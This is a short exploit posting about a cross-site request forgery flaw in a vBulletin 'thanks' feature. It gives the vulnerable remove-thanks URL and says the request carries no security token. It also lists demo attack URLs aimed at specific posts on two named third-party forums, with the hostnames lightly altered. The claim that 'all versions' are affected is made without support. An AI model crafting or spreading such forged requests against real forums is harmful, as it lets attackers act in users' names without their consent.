########################################################
# Exploit Title: Vbulletin forums delete thanks CSRF (All versions)
# Date : 2016/08/22
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: https://www.vbulletin.com/
# Tested on: [Win 7/Firefox]
# Version : All versions
# Date : 27/08/2016
########################################################
#
# Location : http://localhost/forums/post_thanks.php?do=post_thanks_remove_user&p=[POST_ID]
#
########################################################
# Demo 1 :
#
# for this: http://ashiyane.org/forums/showthread.php?13217-Target-Trainings&p=985835&viewfull=1#post985835
#http://ashiyXane.org/forums/post_thanks.php?do=post_thanks_remove_user&p=985835
#
#for this: http://forums.irsXecteam.org/showthread.php?t=4686&p=5307&viewfull=1#post5307
#http://forums.irsXecteam.org/post_thanks.php?do=post_thanks_remove_user&p=5307
########################################################
# Description :
#
#When you want to add a thanks a parameter called securitytoken but in thanks_remove the parameter token will not be sent
#This problem is caused CSRF bug
########################################################
# discovered by : MALWaRE43
########################################################